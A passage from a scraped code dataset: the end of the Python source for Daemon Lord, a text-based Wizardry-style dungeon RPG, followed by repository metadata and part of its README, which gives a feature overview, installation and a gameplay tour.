battle\n game.chest.chest()\n game.battle.gold *= 2 # Twice the gold for a chest.\n if party.defeated():\n break\n if not game.battle.treasure:\n game.battle.exp = 0\n game.battle.gold = 0\n survnum = sum(1 for m in party.members\n if m.state in [State.OK, State.ASLEEP,\n State.PARALYZED, State.STONED])\n meswin.print(f\"Each survivor gets {game.battle.exp//survnum} e.p.\",\n start=' ')\n meswin.print(f\"Each survivor gets {game.battle.gold//survnum} gold.\",\n start=' ')\n for mem in party.members:\n if mem.state == State.ASLEEP:\n mem.state = State.OK\n if mem.state in [State.OK, State.PARALYZED, State.STONED]:\n mem.exp += game.battle.exp//survnum\n mem.gold += game.battle.gold//survnum\n if game.battle.ran: # ran?\n if floor_obj != party.floor_obj:\n floor_obj = party.floor_obj\n vscr.disp_scrwin(floor_obj)\n\n exit = dungeon.check_move_floor(floor_obj)\n if exit: # Exit from dungeon\n mlist = party.members[:]\n for mem in mlist:\n if mem.poisoned:\n mem.poisoned = False\n mem.hpplus = 0\n if mem.state in [State.PARALYZED, State.STONED, State.DEAD,\n State.ASHED]:\n party.members.remove(mem)\n # Carried away in an ambulance\n game.hospitalized.append(mem)\n\n party.light_cnt = 0\n party.ac = 0\n party.silenced = False\n party.identify = False\n party.gps = False\n\n break\n if party.floor_move:\n continue\n\n c = getch(wait=True)\n draw = True\n if c:\n if c == 'c':\n camp(game, floor_obj)\n if game.party.floor_move:\n continue\n elif c in 'hH' and party.x > 0:\n if (c == 'H' and config['debug']) or \\\n floor_obj.can_move(party.x-1, party.y):\n party.move(party.x-1, party.y)\n meswin.print(\"west\")\n elif c in 'kK' and party.y > 0:\n if (c == 'K' and config['debug']) or \\\n floor_obj.can_move(party.x, party.y-1):\n party.move(party.x, party.y-1)\n meswin.print(\"north\")\n elif c in 'jJ' and party.y < floor_obj.y_size-1:\n if (c == 'J' and config['debug']) or \\\n floor_obj.can_move(party.x, party.y+1):\n party.move(party.x, party.y+1)\n meswin.print(\"south\")\n elif c in 'lL' and party.x < floor_obj.x_size-1:\n if (c == 'L' and config['debug']) or \\\n floor_obj.can_move(party.x+1, party.y):\n party.move(party.x+1, party.y)\n meswin.print(\"east\")\n elif c == 'o': # open or unlock door\n vscr.disp_scrwin(floor_obj)\n floor_obj.open_door(game, meswin)\n elif c == '*' and config['debug']:\n breakpoint()\n elif c == '.':\n meswin.print('.')\n vscr.disp_scrwin()\n elif c == '>' and config['debug']:\n party.floor_move = 1 # go down\n for m in party.members:\n m.deepest = max(m.deepest, party.floor)\n elif c == '<' and config['debug']:\n party.floor_move = 2 # go up\n elif c == 'S':\n game.save()\n meswin.print(\"saved.\")\n vscr.disp_scrwin()\n elif c == '#' and config['debug']:\n for y in range(party.y-10, party.y+10+1):\n for x in range(party.x-32, party.x+32+1):\n floor_obj.put_tile(\n x, y, floor_obj.get_tile(x, y), orig=False)\n else:\n pass # draw = False\n else:\n draw = False\n if draw:\n vscr.disp_scrwin(floor_obj)\n\n vscr.meswins = meswins_save\n vscr.cls()\n party.place = Place.EDGE_OF_TOWN\n vscr.disp_scrwin()\n\n\ndef dispatch(game):\n \"\"\"\n dispatch either to edge of town, castle or maze\n \"\"\"\n while game.party.place != Place.LEAVE_GAME:\n pl = game.party.place\n if pl == Place.EDGE_OF_TOWN:\n edge_town(game)\n elif pl == Place.CASTLE:\n castle(game)\n elif pl == Place.MAZE:\n maze(game)\n\n\ndef main():\n game = Game() # singleton\n party = Party(0, 0, 1)\n game.party = party\n game.load_spelldef()\n game.load_itemdef()\n game.load_monsterdef()\n party.place = Place.CASTLE\n w, h = terminal_size()\n vscr = Vscr(w, h-1) # singleton\n # vscr = Vscr(78, 24) # +++++++++++++++\n game.vscr = vscr\n vscr.game = game\n # meswin for scrollwin\n vscr.meswins.append(Meswin(vscr, 43, vscr.height-7, vscr.width-42, 7))\n # meswin for castle/edge of town\n vscr.meswins.append(Meswin(vscr, 10, vscr.height//5, vscr.width-20,\n (vscr.height-8)*2//3, frame=True))\n game.spell = Spell(game) # singleton\n game.dungeon = Dungeon(game) # singleton\n game.battle = Battle(game) # singleton\n game.chest = Chest(game) # singleton\n\n dispatch(game)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.3963751494884491, "alphanum_fraction": 0.4127925634384155, "avg_line_length": 34.86302947998047, "blob_id": "e9df5736120784b2eb4df966c04ad34444976390", "content_id": "0896c97ed945136795762cbc57d4e37ab558588c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 118590, "license_type": "permissive", "max_line_length": 313, "num_lines": 3300, "path": "/README.md", "repo_name": "Kuiteland/daemonlord", "src_encoding": "UTF-8", "text": "\n# Table of Contents\n\n1. [dl.py - Daemon Lord](#org0a10bdc)\n 1. [Overview](#org5d33148)\n 1. [Wizardry clone](#org0a71bd2)\n 2. [Rogue-like dungeon maps](#org385f9a0)\n 3. [Auto-generated maps w/o resetting levels and items of characters](#org845dba2)\n 4. [A little more user friendly than Wizardry](#org488af41)\n 2. [Important notice: alpha quality](#orga769fd8)\n 3. [Getting started](#org44a9803)\n 1. [Prerequisites](#orgccd68e3)\n 2. [Installation](#org77a855b)\n 4. [How to Play](#org8aac521)\n 1. [Tips](#org0b988dd)\n2. [Contributing](#org98494e0)\n3. [License](#orgdc1970f)\n4. [Quick Tour of Daemon Lord](#org7fbe6c3)\n 1. [Game start](#orge3aa2f7)\n 2. [Edge of Town](#orgf434b4e)\n 1. [Training Grounds](#orgb6e8b1e)\n 3. [Castle](#orgf134270)\n 1. [Hawthorne Tavern](#orgac59c49)\n 2. [Trader Jay's](#org99570fd)\n 3. [Equip](#org3c59398)\n 4. [Save and Resume](#orgd334654)\n 5. [Dungeon](#org8f46950)\n 1. [Walk around the Dungeon](#org56d6bb2)\n 2. [Battle](#org9440384)\n 3. [Chest](#orgc02a53d)\n 4. [Friendly monsters](#orgb3c2450)\n 5. [Get ouf of the Dungeon](#org8827640)\n 6. [A new dungeon!](#orgf859d65)\n 7. [Camp](#org3bdba13)\n 8. [Heal all members](#org70c73a4)\n 9. [Prep for adventure](#orge4f1380)\n 10. [Save and Resume from camp](#orgdeabb28)\n 6. [Castle](#orged946f6)\n 1. [The Lakehouse Inn](#org78054aa)\n5. [Spells](#org00dea26)\n 1. [Overview](#org37d2ec2)\n 2. [Usage](#org31faaf3)\n 3. [Mage Spells](#org502fc72)\n 4. [Priest Spells](#org5e7606d)\n6. [Monsters](#orgad97807)\n 1. [Shallow floors](#org5a27944)\n 2. [Middle depth floors](#orgde7ee28)\n 3. [Deep floors](#orgb8d9202)\n 4. [Boss and special monsters](#orge29b2ef)\n 1. [gate keeper](#org7b8b294)\n 2. [d????? ???, t?? ????, a????](#org93ed8e5)\n 3. [d????? ????](#orgf5f2654)\n 4. [S???????, N??????](#org52768ce)\n7. [Contact](#org861f339)\n8. [Acknowledgements](#org99eca6e)\n\n\n\n<a id=\"org0a10bdc\"></a>\n\n# dl.py - Daemon Lord\n\nDaemon Lord is a Wizardry-clone RPG with rogue-like (ie, text-based), randomly-created 2D maps.\n\n daemon lord - dl - [battle] floor: 6 ( 69/ 54) <identify> <light> ^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#...........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#...........#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n #######^^^| 1) 2 tycoons (2) |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^| |^^^^^^^^^^^^^\n .....##^^^^^^^^^^^^^^^^^^^^^^^^^^^^##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n .....##^^^| * andy swings violently at tycoon and hits 1 times for 6 |^^^^^^^^^^^^^\n .....##^^^| damage. |^^^^^^^^^^^^^\n ###.###^^^| * bean slashes violently at tycoon and hits 2 times for |^^^^^^^^^^^^^\n ###.###^^^| 9 damage. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is killed. |^^^^^^^^^^^^^\n ^##.##^^^^| * ed stabs violently at tycoon and hits 1 times for 2 |^^^^^^^^^^^^^\n ^##.##^^^^| damage. |^^^^^^^^^^^^^\n ^##.##^^^^| * fun casted shunmin. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is not slept. |^^^^^^^^^^^^^\n ^##.##^^^^| tycoon is not slept. |^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^##.......###...##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^##...#######......##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^###.########...#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^###.###...##...#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ........##^^^^^^^^^^^^^^^##.###...###.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^^##...........##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ###.######^^^^^^^^^^^^^^^######...######^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^##.##^^^^^^^^^^^^^^^^^^^###############^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^##.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* north ^\n 1 andy G-FIG -2 63 fight ^ Which direction? - ;)leave > k ^\n 2 bean G-FIG -3 70 fight ^* Opened. ^\n 3 cammy G-FIG -2 77 fight ^* north ^\n 4 dexie N-THI 8 53 fight ^* saved. ^\n 5 ed G-PRI 8 67 fight ^* north ^\n 6 fun G-MAG 8 35 shunmin ^* *** encounter *** ^\n\n\n<a id=\"org5d33148\"></a>\n\n## Overview\n\n\n<a id=\"org0a71bd2\"></a>\n\n### Wizardry clone\n\n- Based on Wizardry I; Proving Grounds of the Mad Overlord\n- Party of up to six members\n- Battles with monster parties in the dungeon\n- Gain experience points and level up\n- Get gold and powerful items from trap-protected chests\n- Roughly 50 magic spells, 100 items and 100 monsters (for now)\n- Need to type spells and chest traps accurately\n\n\n<a id=\"org385f9a0\"></a>\n\n### Rogue-like dungeon maps\n\n- Text-based, 2D dungeon maps\n- Move with `h, j, k, l` keys\n- 10 (or more) layers deep\n- Maps are auto-generated.\n\n\n<a id=\"org845dba2\"></a>\n\n### Auto-generated maps w/o resetting levels and items of characters\n\n- Every time you go down the dungeon, you will see different maps\n- No elevator but you have 'tsubasa' (mage level 2) spell.\n- 'tsubasa' allows you to teleport to the deepest floor the caster has visited\n - You will be landed on the upstairs of the floor\n - You still need to look for the downstairs which should be far away from where you land\n- You can restart your adventure from a floor that should match your character levels\n\n\n<a id=\"org488af41\"></a>\n\n### A little more user friendly than Wizardry\n\n- Re-calculate the bonus value with `.` key when creating a character\n- Age doesn't matter anymore\n- Save and resume anywhere in the dungeon, preserving floor maps and spells in effect such as identification of monsters or protection\n- Poison effect stops at HP = 1\n- You don't have to pool gold anymore. You can pay as a party.\n- Group heal spells for the entire party\n\n\n<a id=\"orga769fd8\"></a>\n\n## Important notice: alpha quality\n\nCurrently, DL (daemon lord) is under development and it's in an alpha code quality. Probably there are still many bugs, some of them might be critical.\n\nPlease file issues on github, or send bug reports (or comments) to achiwa912+gmail.com (replace '+' with '@').\n\n\n<a id=\"org44a9803\"></a>\n\n## Getting started\n\n\n<a id=\"orgccd68e3\"></a>\n\n### Prerequisites\n\n- macOS, Linux (or Windows)\n - Developed on macOS BigSur and Fedora 32\n - It might run on Windows but not tested\n- Python 3.8 or later (it uses the \"walrus\" assignment expression)\n- Terminal of 78x24 or larger\n- dl.py - the program\n- monsters.csv - monster data file\n- spells.csv - spell data file\n- items.csv - item data file\n\n\n<a id=\"org77a855b\"></a>\n\n### Installation\n\n1. Setup python 3.8 or later\n2. Place dl.py, monsters.csv, spells.csv, items.csv in the same directory\n3. Run \"python dl.py\"\n\n\n<a id=\"org8aac521\"></a>\n\n## How to Play\n\n1. Create and register characters at Training Grounds\n2. Form a party at Hawthorne Tavern\n3. Purchase weapons and armors at Trader Jay's\n4. Equip weaspns and armors at Hawthorne's Tavern\n5. Go in to the dungeon\n6. Battles with monsters\n7. Go back to the Edge of Town / Castle\n8. Get some rest at the Lakehouse Inn (you might level up)\n\nYou can save either at Edge of Town or from the Camp menu.\nYou can perform resume operation only from Edge of Town.\n\n\n<a id=\"org0b988dd\"></a>\n\n### Tips\n\n- Have the spell and monster lists (see below) near you\n- Try unlocking (an locked door) or disarming (a chest) until you succeed\n- Run away from strong (or annoying) monsters\n- Save regularly\n- ctrl-c is disabled but you can Q)uit game on a prompt (press 'Q' (shift-q))\n\n\n<a id=\"org98494e0\"></a>\n\n# Contributing\n\nAny contributions you make are greatly appreciated.\n\n1. Fork the Project\n2. Create your Feature Branch (git checkout -b feature/AmazingFeature)\n3. Commit your Changes (git commit -m 'Add some AmazingFeature')\n4. Push to the Branch (git push origin feature/AmazingFeature)\n5. Open a Pull Request\n\n\n<a id=\"orgdc1970f\"></a>\n\n# License\n\nDaemon Lord is under [MIT license](https://en.wikipedia.org/wiki/MIT_License).\n\n\n<a id=\"org7fbe6c3\"></a>\n\n# Quick Tour of Daemon Lord\n\n\n<a id=\"orge3aa2f7\"></a>\n\n## Game start\n\nDL (Daemon Lord) starts with the screen below at the Castle.\n\n daemon lord - dl - [castle] floor:?? (???/???) \n \n \n \n \t | * *** Castle *** | \n \t | h)awthorne tavern | \n \t | t)rader jay's | \n \t | i)lakehouse inn | \n \t | m)oss general hospital | \n \t | e)dge of town | \n \t | Command? > | \n \t | | \n \t | | \n \t | | \n \n \n \n # name class ac hp status \n 1 \n 2 \n 3 \n 4 \n 5 \n 6\n\nWhen you first start the game, you need to go to Edge of Town (press `e`) > Training Grounds (press `t`), and then create characters (press `c`).\n\n\n<a id=\"orgf434b4e\"></a>\n\n## Edge of Town\n\n\n<a id=\"orgb6e8b1e\"></a>\n\n### Training Grounds\n\nAt Training Grounds, you can create or inspect characters. You create one character at a time.\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \n \n \t | S)ave and quit game | \n \t | R)esume from saved data | \n \t | Command? > t | \n \t | * *** training grounds *** | \n \t | c)reate a character | \n \t | i)nspect a character | \n \t | l)eave | \n \t | Command? > c | \n \t | * Enter new name | \n \t | > | \n \n \n \n # name class ac hp status \n 1 \n 2 \n 3 \n 4 \n 5 \n 6 \n\nTo create a character, input its name, choose race (human, elf, dwarf, gnome, hobbit) and alignment (good, neutral, evil). Race determines base attribute values as in Wizardry. For example, human's base strength is 8.\n\nHere's base attribute table:\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">race</th>\n<th scope=\"col\" class=\"org-right\">str</th>\n<th scope=\"col\" class=\"org-right\">i.q.</th>\n<th scope=\"col\" class=\"org-right\">pie</th>\n<th scope=\"col\" class=\"org-right\">vit</th>\n<th scope=\"col\" class=\"org-right\">agi</th>\n<th scope=\"col\" class=\"org-right\">luk</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">human</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">9</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">elf</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">6</td>\n<td class=\"org-right\">9</td>\n<td class=\"org-right\">6</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">dwarf</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">6</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">gnome</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">8</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">7</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hobbit</td>\n<td class=\"org-right\">5</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">7</td>\n<td class=\"org-right\">6</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-right\">15</td>\n</tr>\n</tbody>\n</table>\n\n | Command? > c | \n | * Enter new name | \n | > Adrien | \n | Choose race - h)uman e)lf d)warf g)nome o)hobbit > | \n | d | \n | * dwarf | \n | Choose alignment - g)ood n)eutral e)vil > g | \n | * Alignment: good | \n\nThen you will distribute assigned bonus points to attributes.\nMove the cursor `>` with `j, k` keys and decrease (`h`) or increase (`l`) the attribute value. When bonus value reaches zero, you can choose a class by pressing `x`. The maximum attribute values here is 18 (but subject to change).\n\nTip: If you don't like the bonus point assigned, you can recalculate one with `.` key. You might want to recalculate bonus until you get 16 or higher.\n\nEligible classes are listed at the bottom of the window. To choose a class, type the first letter of a class. For example, `f` for fighter, `m` for mage, etc.\n\nClasses have attribute requirements and in some cases alignment requirements as in Wizardry. For example, fighter requires strength>=11. Theif requires agility>=11 as well as alignment must be either neutral or evil.\n\nClass requirement table:\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">class</th>\n<th scope=\"col\" class=\"org-left\">str</th>\n<th scope=\"col\" class=\"org-right\">i.q.</th>\n<th scope=\"col\" class=\"org-right\">pie</th>\n<th scope=\"col\" class=\"org-left\">vit</th>\n<th scope=\"col\" class=\"org-left\">agi</th>\n<th scope=\"col\" class=\"org-left\">luk</th>\n<th scope=\"col\" class=\"org-left\">good</th>\n<th scope=\"col\" class=\"org-left\">neutral</th>\n<th scope=\"col\" class=\"org-left\">evil</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">fighter</td>\n<td class=\"org-left\">11</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mage</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">thief</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-right\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">11</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">bishop</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">samurai</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">11</td>\n<td class=\"org-right\">10</td>\n<td class=\"org-left\">14</td>\n<td class=\"org-left\">10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ninja</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">17</td>\n<td class=\"org-right\">15</td>\n<td class=\"org-left\">16</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">16</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">ok</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lord</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-right\">12</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">14</td>\n<td class=\"org-left\">15</td>\n<td class=\"org-left\">ok</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">-</td>\n</tr>\n</tbody>\n</table>\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \t | * Distribute bonus points - | \n \t | h)minus j)down k)up l)plus | \n \t | *| .)change bonus x)done | \n \t | >| | \n \t | | strength 18 | \n \t | | iq 13 | \n \t | *| piety 14 | \n \t | | vitality 10 | \n \t | *| agility > 6 | \n \t | *| luck 6 | \n \t | >| | \n \t | *| bonus 0 | \n \t | | \n \t | fighter mage priest bishop | \n \t | Choose class (f/m/p/b) > | \n\nA recommended party consists of three fighters, a thief, a priest and a mage. You should create six characters before going into the dungeon. Tip: You should have one thief in your party. Without one, you might not be able to unlock doors in the dungeon.\n\nTo view created charactes, type `i` at the Training Grounds menu.\n\n | * *** training grounds *** | \n | c)reate a character | \n | i)nspect a character | \n | l)eave | \n | Command? > |\n\nYou can move cursor with `j, k` key and type `i` to view the character.\n\n | * Inspect characters | \n | * - j)down k)up i)nspect d)elete l)eave | \n | >1 ab Lv 1 dwa-g-fig | \n | 2 ben Lv 1 hum-g-fig |\n\nAlso, you can `d)elete` the character from here. Deleted characters are lost forever and you can't undo a delete operation.\n\n daemon lord - dl - [training_grounds] floor:?? (???/???) \n \n \t | ab L 1 g-fig dwarf | \n \t | | \n \t | strength 18 gold 102 lvl 1 | \n \t | i.q. 7 e.p. 0 rip 0 | \n \t | piety 10 next 1000 a.c. 10 | \n \t | vitality 13 marks 0 | \n \t | agility 11 h.p. 13/ 13 | \n \t | luck 8 status OK | \n \t | | \n \t | mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ | \n \t | 1) 2) | \n \t | 3) 4) | \n \t | 5) 6) | \n \t | 7) 8) | \n \t | | \n # name | i)tems s)pells jk)change member l)leave > |\n\nAs you have already noticed, DL gives you a guide of which letter you can type when it prompts input from you. For example, \"i)tem s)pells ..\" means you can type `i` or `s`.\n\nHave you created six characters? Then, you should go to Castle > Hawthorne Tavern to form a party. Type `l` to leave the Training Grounds and then type `c` to go to Castle.\n\n\n<a id=\"orgf134270\"></a>\n\n## Castle\n\n | * *** Castle *** | \n | h)awthorne tavern | \n | t)rader jay's | \n | i)lakehouse inn | \n | m)oss general hospital | \n | e)dge of town | \n | Command? > |\n\nFrom the Castle menu, you can visit several places, but you want to go to Hawthorne Tavern now so type `h`.\n\n\n<a id=\"orgac59c49\"></a>\n\n### Hawthorne Tavern\n\n | * *** The Hawthorne Tavern *** | \n | Command? - a)dd r)emove i)nspect d)ivvy gold l)eave > |\n\nAt the Tavern, you can add, remove or inspect characters. Also, you can equally divide gold among party members. As you want to form a party, type `a` to add members to the party.\n\nUse `j, k` keys to choose members and `x` to add.\n\n | * | Add who to the party? | | \n | | - j)down k)up x)choose l)eave |gold l)eave > a | \n | | > 1 ab Lv 1 DWA-G-FIG | | \n | | 2 ben Lv 1 HUM-G-FIG | | \n | | 3 cam Lv 1 DWA-G-FIG | | \n | | 4 dia Lv 1 HOB-N-THI | | \n | | 5 emily Lv 1 GNO-G-PRI | | \n | | 6 faun Lv 1 ELF-G-MAG | |\n\nHere, you can just type `x` for six times to add the six members to the party.\nNow, they are shown in the party window at the bottom left of the screen.\n\n # name class ac hp status \n 1 ab G-FIG 10 13 OK \n 2 ben G-FIG 10 12 OK \n 3 cam G-FIG 10 10 OK \n 4 dia N-THI 10 7 OK \n 5 emily G-PRI 10 13 OK \n 6 faun G-MAG 10 7 OK\n\n\n<a id=\"org99570fd\"></a>\n\n### Trader Jay's\n\nBefore heading straight to the dungeon, we need to purchase weapons and armors, and equip them. So, let's go to Castle > Trader Jay's for some shopping.\n\nEach character is given between 100 and 200 gold upon creation. You can expect a party with six members would have roughly 900 gold in total.\n\nAt Trader Jay's, you'll be asked who in the party to enter the store. Specify the number of a member in the party. You can buy, sell, uncurse, identify items. You can also pool gold here. Choose `b)uy` for shopping.\n\n | * *** Trader Jay's *** | \n | Who? - # or l)eave > 1 | \n | * Welcome, ab. | \n | * You have 102 gold. | \n | b)uy s)ell u)ncurse i)dentify p)ool gold l)eave > | \n\nAnother window opens for items they sell. This is the weapon list page. Use `j, k` keys to move the cursor (`>`). Let's type `x` and buy a long sword for Ab.\n\n daemon lord - dl - [trader_jays] floor:?? (???/???) \n \t | ab has 102 gold | \n \t | jk)cursor x)choose hl)page ;)leave | \n \t | > 1 long sword 25 $ | \n \t | | 2 sling 150 | | \n \t | | 3 mage's bow 1200 | | \n \t | | 4 bow 1500 | | \n \t | | 5 holy bow 8000# | | \n \t | | 6 short sword 15 $ | | \n \t | | 7 short sword +1 15000 | | \n \t | | 8 mace 30 $ | | \n \t | | 9 anointed flail 150 | | \n \t | | 10 wand 10 $ |)eave > |\n\nTo change item categories, use `h, l` keys. Below is the armor list page. Let's buy a chain mail for him.\n\n daemon lord - dl - [trader_jays] floor:?? (???/???) \n \t | Sorry, you can't afford it. | \n \t | Will someone else pay? (y/n)> | \n \t | 1 robe 15 $ | \n \t | | 2 leather armor 50 $ | | \n \t | | 3 leather +1 1500 | | \n \t | | > 4 chain mail 90 | | \n \t | | 5 chain +1 1500 | | \n \t | | 6 breast plate 200 | | \n \t | | 7 breast +1 1500 | | \n \t | | 8 plate mail 750 | | \n \t | | 9 plate +1 1500 | | \n\nOops, he doesn't have the money. But, no worries, you can pay as the party. Type `y` to the question \"Will someone else pay? (y/n)\". This way, you don't have to pool gold first to the current shopper anymore.\n\nTip: Recommended shopping list:\n\n- fighter - long sword, chain mail, large shield\n- thief - sling\n- priest - sling (if you can still afford it)\n- mage - (nothing)\n\nBasically, the front (ie, the first three) members should equip heavily because monsters mostly aim at front members when physically attack. Short-range wepons can't be used by the 4th to 6th members.\n\nsling is a long-range weapon that everyone can use. You can't expect much from sling and its damage is at best 1 or 2, but better than nothing. Long-ranged weapons tend to be less powerful and more expensive than short-range ones.\n\n\n<a id=\"org3c59398\"></a>\n\n### Equip\n\nYou can equip items at Hawthorne Tavern or while camping in the dungeon. Let's go to Hawthorne Tavern.\n\nAt Hatthorne Tavern, first `i)nspect` a character and then choose `i)tems` > item number > `e)quip` .\n\n daemon lord - dl - [hawthorne_tavern] floor:?? (???/???) \n \n | ab| * which item? # or l)leave | | \n | | 2) chain mail | | \n | st| u)se e)quip t)rade d)rop l)eave > | 1 | \n | | | 0 | \n | | |10 | \n | vi| | | \n | a| | | \n | | | | \n | | \n | mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ | \n | 1) *long sword 2) chain mail | \n | 3) large shield 4) | \n | 5) 6) | \n | 7) 8) |\n\nEquipped items will have `*` mark next to the item name. You need to equip one item at a time and for each member. To change members, type `j, k` .\n\n\n<a id=\"orgd334654\"></a>\n\n## Save and Resume\n\nTo save and quit the game, go to Edge of Town and type `S` (capital-S).\n\n | * *** Edge of Town *** | \n | m)aze | \n | t)raining grounds | \n | c)astle | \n | S)ave and quit game | \n | R)esume from saved data | \n | Command? > S | \n | * Thank you for playing. | \n | * See you soon. | \n\nYou need to run `python dl.py` again to restart and resume the game. After restarting the game, go to Edge of Town and choose `R)esume from saved data` . That is, capital-R. Automatic resume is not supported.\n\n\n<a id=\"org8f46950\"></a>\n\n## Dungeon\n\nNow, you are ready for the Dungeon. At Edge of Town, choose `m)aze` and voila!\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n 